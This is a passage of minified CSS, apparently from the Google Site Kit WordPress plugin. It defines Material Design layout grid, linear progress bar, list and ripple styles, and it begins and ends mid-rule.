3}}.mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-tablet{width:calc(50% - 16px);width:calc(50% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-tablet{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-tablet{width:calc(62.5% - 16px);width:calc(62.5% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-tablet{width:auto;grid-column-end:span 5}}.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-tablet{width:calc(75% - 16px);width:calc(75% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-tablet{width:auto;grid-column-end:span 6}}.mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-tablet{width:calc(87.5% - 16px);width:calc(87.5% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-tablet{width:auto;grid-column-end:span 7}}.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-tablet{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-tablet{width:auto;grid-column-end:span 8}}.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-tablet{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-tablet{width:auto;grid-column-end:span 8}}.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-tablet{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-tablet{width:auto;grid-column-end:span 8}}.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-tablet{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-tablet{width:auto;grid-column-end:span 8}}.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-tablet{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-tablet, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-tablet{width:auto;grid-column-end:span 8}}}@media(max-width: 600px){.mdc-layout-grid__cell{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px));box-sizing:border-box;margin:8px;margin:calc(var(--mdc-layout-grid-gutter-phone, 16px) / 2)}@supports(display: grid){.mdc-layout-grid__cell{width:auto;grid-column-end:span 4}}@supports(display: grid){.mdc-layout-grid__cell{margin:0}}.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-phone{width:calc(25% - 16px);width:calc(25% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-1,.mdc-layout-grid__cell--span-1-phone{width:auto;grid-column-end:span 1}}.mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-phone{width:calc(50% - 16px);width:calc(50% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-2,.mdc-layout-grid__cell--span-2-phone{width:auto;grid-column-end:span 2}}.mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-phone{width:calc(75% - 16px);width:calc(75% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-3,.mdc-layout-grid__cell--span-3-phone{width:auto;grid-column-end:span 3}}.mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-4,.mdc-layout-grid__cell--span-4-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-5,.mdc-layout-grid__cell--span-5-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-6,.mdc-layout-grid__cell--span-6-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-7,.mdc-layout-grid__cell--span-7-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-8,.mdc-layout-grid__cell--span-8-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-9,.mdc-layout-grid__cell--span-9-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-10,.mdc-layout-grid__cell--span-10-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-11,.mdc-layout-grid__cell--span-11-phone{width:auto;grid-column-end:span 4}}.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.mdc-layout-grid__cell--span-12,.mdc-layout-grid__cell--span-12-phone{width:auto;grid-column-end:span 4}}}.mdc-layout-grid__cell--order-1{order:1}.mdc-layout-grid__cell--order-2{order:2}.mdc-layout-grid__cell--order-3{order:3}.mdc-layout-grid__cell--order-4{order:4}.mdc-layout-grid__cell--order-5{order:5}.mdc-layout-grid__cell--order-6{order:6}.mdc-layout-grid__cell--order-7{order:7}.mdc-layout-grid__cell--order-8{order:8}.mdc-layout-grid__cell--order-9{order:9}.mdc-layout-grid__cell--order-10{order:10}.mdc-layout-grid__cell--order-11{order:11}.mdc-layout-grid__cell--order-12{order:12}.mdc-layout-grid__cell--align-top{align-self:flex-start}@supports(display: grid){.mdc-layout-grid__cell--align-top{align-self:start}}.mdc-layout-grid__cell--align-middle{align-self:center}.mdc-layout-grid__cell--align-bottom{align-self:flex-end}@supports(display: grid){.mdc-layout-grid__cell--align-bottom{align-self:end}}@media(min-width: 961px){.mdc-layout-grid--fixed-column-width{width:1176px;width:calc( var(--mdc-layout-grid-column-width-desktop, 72px) * 12 + var(--mdc-layout-grid-gutter-desktop, 24px) * 11 + var(--mdc-layout-grid-margin-desktop, 24px) * 2 )}}@media(min-width: 601px)and (max-width: 960px){.mdc-layout-grid--fixed-column-width{width:720px;width:calc( var(--mdc-layout-grid-column-width-tablet, 72px) * 8 + var(--mdc-layout-grid-gutter-tablet, 16px) * 7 + var(--mdc-layout-grid-margin-tablet, 16px) * 2 )}}@media(max-width: 600px){.mdc-layout-grid--fixed-column-width{width:368px;width:calc( var(--mdc-layout-grid-column-width-phone, 72px) * 4 + var(--mdc-layout-grid-gutter-phone, 16px) * 3 + var(--mdc-layout-grid-margin-phone, 16px) * 2 )}}.mdc-layout-grid--align-left{margin-right:auto;margin-left:0}.mdc-layout-grid--align-right{margin-right:0;margin-left:auto}@keyframes primary-indeterminate-translate{0%{transform:translateX(0)}20%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(0)}59.15%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(83.67142%)}100%{transform:translateX(200.611057%)}}@keyframes primary-indeterminate-scale{0%{transform:scaleX(0.08)}36.65%{animation-timing-function:cubic-bezier(0.334731, 0.12482, 0.785844, 1);transform:scaleX(0.08)}69.15%{animation-timing-function:cubic-bezier(0.06, 0.11, 0.6, 1);transform:scaleX(0.661479)}100%{transform:scaleX(0.08)}}@keyframes secondary-indeterminate-translate{0%{animation-timing-function:cubic-bezier(0.15, 0, 0.515058, 0.409685);transform:translateX(0)}25%{animation-timing-function:cubic-bezier(0.31033, 0.284058, 0.8, 0.733712);transform:translateX(37.651913%)}48.35%{animation-timing-function:cubic-bezier(0.4, 0.627035, 0.6, 0.902026);transform:translateX(84.386165%)}100%{transform:translateX(160.277782%)}}@keyframes secondary-indeterminate-scale{0%{animation-timing-function:cubic-bezier(0.205028, 0.057051, 0.57661, 0.453971);transform:scaleX(0.08)}19.15%{animation-timing-function:cubic-bezier(0.152313, 0.196432, 0.648374, 1.004315);transform:scaleX(0.457104)}44.15%{animation-timing-function:cubic-bezier(0.257759, -0.003163, 0.211762, 1.38179);transform:scaleX(0.72796)}100%{transform:scaleX(0.08)}}@keyframes buffering{to{transform:translateX(-10px)}}@keyframes primary-indeterminate-translate-reverse{0%{transform:translateX(0)}20%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(0)}59.15%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(-83.67142%)}100%{transform:translateX(-200.611057%)}}@keyframes secondary-indeterminate-translate-reverse{0%{animation-timing-function:cubic-bezier(0.15, 0, 0.515058, 0.409685);transform:translateX(0)}25%{animation-timing-function:cubic-bezier(0.31033, 0.284058, 0.8, 0.733712);transform:translateX(-37.651913%)}48.35%{animation-timing-function:cubic-bezier(0.4, 0.627035, 0.6, 0.902026);transform:translateX(-84.386165%)}100%{transform:translateX(-160.277782%)}}@keyframes buffering-reverse{to{transform:translateX(10px)}}.mdc-linear-progress{position:relative;width:100%;height:4px;transform:translateZ(0);transition:opacity 250ms 0ms cubic-bezier(0.4, 0, 0.6, 1);overflow:hidden}.mdc-linear-progress__bar{position:absolute;width:100%;height:100%;animation:none;transform-origin:top left;transition:transform 250ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-linear-progress__bar-inner{display:inline-block;position:absolute;width:100%;height:100%;animation:none}.mdc-linear-progress__buffering-dots{position:absolute;width:100%;height:100%;animation:buffering 250ms infinite linear;background-repeat:repeat-x;background-size:10px 4px}.mdc-linear-progress__buffer{position:absolute;width:100%;height:100%;transform-origin:top left;transition:transform 250ms 0ms cubic-bezier(0.4, 0, 0.6, 1)}.mdc-linear-progress__primary-bar{transform:scaleX(0)}.mdc-linear-progress__secondary-bar{visibility:hidden}.mdc-linear-progress--indeterminate .mdc-linear-progress__bar{transition:none}.mdc-linear-progress--indeterminate .mdc-linear-progress__primary-bar{left:-145.166611%;animation:primary-indeterminate-translate 2s infinite linear}.mdc-linear-progress--indeterminate .mdc-linear-progress__primary-bar>.mdc-linear-progress__bar-inner{animation:primary-indeterminate-scale 2s infinite linear}.mdc-linear-progress--indeterminate .mdc-linear-progress__secondary-bar{left:-54.888891%;animation:secondary-indeterminate-translate 2s infinite linear;visibility:visible}.mdc-linear-progress--indeterminate .mdc-linear-progress__secondary-bar>.mdc-linear-progress__bar-inner{animation:secondary-indeterminate-scale 2s infinite linear}.mdc-linear-progress--reversed .mdc-linear-progress__bar,.mdc-linear-progress--reversed .mdc-linear-progress__buffer{right:0;transform-origin:center right}.mdc-linear-progress--reversed .mdc-linear-progress__primary-bar{animation-name:primary-indeterminate-translate-reverse}.mdc-linear-progress--reversed .mdc-linear-progress__secondary-bar{animation-name:secondary-indeterminate-translate-reverse}.mdc-linear-progress--reversed .mdc-linear-progress__buffering-dots{animation:buffering-reverse 250ms infinite linear}.mdc-linear-progress--closed{opacity:0}.mdc-linear-progress__bar-inner{background-color:#3c7251;background-color:var(--mdc-theme-primary, #3c7251)}.mdc-linear-progress__buffering-dots{background-image:url("data:image/svg+xml,%3Csvg version=%271.1%27 xmlns=%27http://www.w3.org/2000/svg%27 xmlns:xlink=%27http://www.w3.org/1999/xlink%27 x=%270px%27 y=%270px%27 enable-background=%27new 0 0 5 2%27 xml:space=%27preserve%27 viewBox=%270 0 5 2%27 preserveAspectRatio=%27none slice%27%3E%3Ccircle cx=%271%27 cy=%271%27 r=%271%27 fill=%27%23e6e6e6%27/%3E%3C/svg%3E")}.mdc-linear-progress__buffer{background-color:#e6e6e6}.mdc-linear-progress--indeterminate.mdc-linear-progress--reversed .mdc-linear-progress__primary-bar{right:-145.166611%;left:auto}.mdc-linear-progress--indeterminate.mdc-linear-progress--reversed .mdc-linear-progress__secondary-bar{right:-54.888891%;left:auto}.mdc-list{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:14px;line-height:1.75rem;font-weight:400;letter-spacing:.009375em;text-decoration:inherit;text-transform:inherit;line-height:1.5rem;margin:0;padding:8px 0;list-style-type:none;color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-background, rgba(0, 0, 0, 0.87))}.mdc-list:focus{outline:none}.mdc-list-item__secondary-text{color:rgba(0,0,0,.54);color:var(--mdc-theme-text-secondary-on-background, rgba(0, 0, 0, 0.54))}.mdc-list-item__graphic{background-color:transparent}.mdc-list-item__graphic{color:rgba(0,0,0,.38);color:var(--mdc-theme-text-icon-on-background, rgba(0, 0, 0, 0.38))}.mdc-list-item__meta{color:rgba(0,0,0,.38);color:var(--mdc-theme-text-hint-on-background, rgba(0, 0, 0, 0.38))}.mdc-list-group__subheader{color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-background, rgba(0, 0, 0, 0.87))}.mdc-list--dense{padding-top:4px;padding-bottom:4px;font-size:.812rem}.mdc-list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item{display:flex;position:relative;align-items:center;justify-content:flex-start;height:48px;padding:0 16px;overflow:hidden}.mdc-list-item:focus,.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item:focus{outline:none}.mdc-list-item--selected,.mdc-list-item--activated{color:#3c7251;color:var(--mdc-theme-primary, #3c7251)}.mdc-list-item--selected .mdc-list-item__graphic,.mdc-list-item--activated .mdc-list-item__graphic{color:#3c7251;color:var(--mdc-theme-primary, #3c7251)}.mdc-list-item--disabled{color:rgba(0,0,0,.38);color:var(--mdc-theme-text-disabled-on-background, rgba(0, 0, 0, 0.38))}.mdc-list-item__graphic{margin-left:0;margin-right:32px;width:24px;height:24px;flex-shrink:0;align-items:center;justify-content:center;fill:currentColor}.mdc-list-item[dir=rtl] .mdc-list-item__graphic,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl].googlesitekit-view-only-menu__list-item .mdc-list-item__graphic,[dir=rtl] .mdc-list-item .mdc-list-item__graphic,[dir=rtl] .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item .mdc-list-item__graphic,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl] .googlesitekit-view-only-menu__list-item .mdc-list-item__graphic{margin-left:32px;margin-right:0}.mdc-list .mdc-list-item__graphic{display:inline-flex}.mdc-list-item__meta{margin-left:auto;margin-right:0}.mdc-list-item__meta:not(.material-icons){font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.75rem;line-height:1.25rem;font-weight:400;letter-spacing:.0333333333em;text-decoration:inherit;text-transform:inherit}.mdc-list-item[dir=rtl] .mdc-list-item__meta,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl].googlesitekit-view-only-menu__list-item .mdc-list-item__meta,[dir=rtl] .mdc-list-item .mdc-list-item__meta,[dir=rtl] .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item .mdc-list-item__meta,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl] .googlesitekit-view-only-menu__list-item .mdc-list-item__meta{margin-left:0;margin-right:auto}.mdc-list-item__text{text-overflow:ellipsis;white-space:nowrap;overflow:hidden}.mdc-list-item__text[for]{pointer-events:none}.mdc-list-item__primary-text{text-overflow:ellipsis;white-space:nowrap;overflow:hidden;display:block;margin-top:0;line-height:normal;margin-bottom:-20px;display:block}.mdc-list-item__primary-text::before{display:inline-block;width:0;height:32px;content:"";vertical-align:0}.mdc-list-item__primary-text::after{display:inline-block;width:0;height:20px;content:"";vertical-align:-20px}.mdc-list--dense .mdc-list-item__primary-text{display:block;margin-top:0;line-height:normal;margin-bottom:-20px}.mdc-list--dense .mdc-list-item__primary-text::before{display:inline-block;width:0;height:24px;content:"";vertical-align:0}.mdc-list--dense .mdc-list-item__primary-text::after{display:inline-block;width:0;height:20px;content:"";vertical-align:-20px}.mdc-list-item__secondary-text{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.875rem;line-height:1.25rem;font-weight:400;letter-spacing:.0178571429em;text-decoration:inherit;text-transform:inherit;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;display:block;margin-top:0;line-height:normal;display:block}.mdc-list-item__secondary-text::before{display:inline-block;width:0;height:20px;content:"";vertical-align:0}.mdc-list--dense .mdc-list-item__secondary-text{display:block;margin-top:0;line-height:normal;font-size:inherit}.mdc-list--dense .mdc-list-item__secondary-text::before{display:inline-block;width:0;height:20px;content:"";vertical-align:0}.mdc-list--dense .mdc-list-item,.mdc-list--dense .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-list--dense .googlesitekit-view-only-menu__list-item{height:40px}.mdc-list--dense .mdc-list-item__graphic{margin-left:0;margin-right:36px;width:20px;height:20px}.mdc-list-item[dir=rtl] .mdc-list--dense .mdc-list-item__graphic,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl].googlesitekit-view-only-menu__list-item .mdc-list--dense .mdc-list-item__graphic,[dir=rtl] .mdc-list-item .mdc-list--dense .mdc-list-item__graphic,[dir=rtl] .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item .mdc-list--dense .mdc-list-item__graphic,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl] .googlesitekit-view-only-menu__list-item .mdc-list--dense .mdc-list-item__graphic{margin-left:36px;margin-right:0}.mdc-list--avatar-list .mdc-list-item,.mdc-list--avatar-list .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-list--avatar-list .googlesitekit-view-only-menu__list-item{height:56px}.mdc-list--avatar-list .mdc-list-item__graphic{margin-left:0;margin-right:16px;width:40px;height:40px;border-radius:50%}.mdc-list-item[dir=rtl] .mdc-list--avatar-list .mdc-list-item__graphic,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl].googlesitekit-view-only-menu__list-item .mdc-list--avatar-list .mdc-list-item__graphic,[dir=rtl] .mdc-list-item .mdc-list--avatar-list .mdc-list-item__graphic,[dir=rtl] .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item .mdc-list--avatar-list .mdc-list-item__graphic,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl] .googlesitekit-view-only-menu__list-item .mdc-list--avatar-list .mdc-list-item__graphic{margin-left:16px;margin-right:0}.mdc-list--two-line .mdc-list-item__text{align-self:flex-start}.mdc-list--two-line .mdc-list-item,.mdc-list--two-line .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-list--two-line .googlesitekit-view-only-menu__list-item{height:72px}.mdc-list--two-line.mdc-list--dense .mdc-list-item,.mdc-list--two-line.mdc-list--dense .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-list--two-line.mdc-list--dense .googlesitekit-view-only-menu__list-item,.mdc-list--avatar-list.mdc-list--dense .mdc-list-item,.mdc-list--avatar-list.mdc-list--dense .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-list--avatar-list.mdc-list--dense .googlesitekit-view-only-menu__list-item{height:60px}.mdc-list--avatar-list.mdc-list--dense .mdc-list-item__graphic{margin-left:0;margin-right:20px;width:36px;height:36px}.mdc-list-item[dir=rtl] .mdc-list--avatar-list.mdc-list--dense .mdc-list-item__graphic,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl].googlesitekit-view-only-menu__list-item .mdc-list--avatar-list.mdc-list--dense .mdc-list-item__graphic,[dir=rtl] .mdc-list-item .mdc-list--avatar-list.mdc-list--dense .mdc-list-item__graphic,[dir=rtl] .googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item .mdc-list--avatar-list.mdc-list--dense .mdc-list-item__graphic,.googlesitekit-plugin .googlesitekit-view-only-menu [dir=rtl] .googlesitekit-view-only-menu__list-item .mdc-list--avatar-list.mdc-list--dense .mdc-list-item__graphic{margin-left:20px;margin-right:0}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled){cursor:pointer}a.mdc-list-item,.googlesitekit-plugin .googlesitekit-view-only-menu a.googlesitekit-view-only-menu__list-item{color:inherit;-webkit-text-decoration:none;text-decoration:none}.mdc-list-divider{height:0;margin:0;border:none;border-bottom-width:1px;border-bottom-style:solid}.mdc-list-divider{border-bottom-color:rgba(0,0,0,.12)}.mdc-list-divider--padded{margin:0 16px}.mdc-list-divider--inset{margin-left:72px;margin-right:0;width:calc(100% - 72px)}.mdc-list-group[dir=rtl] .mdc-list-divider--inset,[dir=rtl] .mdc-list-group .mdc-list-divider--inset{margin-left:0;margin-right:72px}.mdc-list-divider--inset.mdc-list-divider--padded{width:calc(100% - 72px - 16px)}.mdc-list-group .mdc-list{padding:0}.mdc-list-group__subheader{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:14px;line-height:1.75rem;font-weight:400;letter-spacing:.009375em;text-decoration:inherit;text-transform:inherit;margin:.75rem 16px}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled){--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0)}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item::before,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled)::before,:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item::after,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled)::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item::before,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled)::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item.mdc-ripple-upgraded::before,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled).mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item.mdc-ripple-upgraded::after,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled).mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item.mdc-ripple-upgraded--unbounded::after,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled).mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item.mdc-ripple-upgraded--foreground-activation::after,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled).mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item.mdc-ripple-upgraded--foreground-deactivation::after,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled).mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item::before,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled)::before,:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item::after,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled)::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item.mdc-ripple-upgraded::after,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled).mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item::before,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled)::before,:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item::after,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled)::after{background-color:#000}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item:hover::before,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled):hover::before{opacity:.04}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled):not(.mdc-ripple-upgraded):focus::before,:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled).mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .googlesitekit-view-only-menu :not(.mdc-list--non-interactive)>.googlesitekit-view-only-menu__list-item:not(.mdc-list-item--disabled):not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}:not(.mdc-list--non-interactive)>:not(.mdc-list-item--disabled).mdc-list-item:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .googlesitekit-view-only-menu 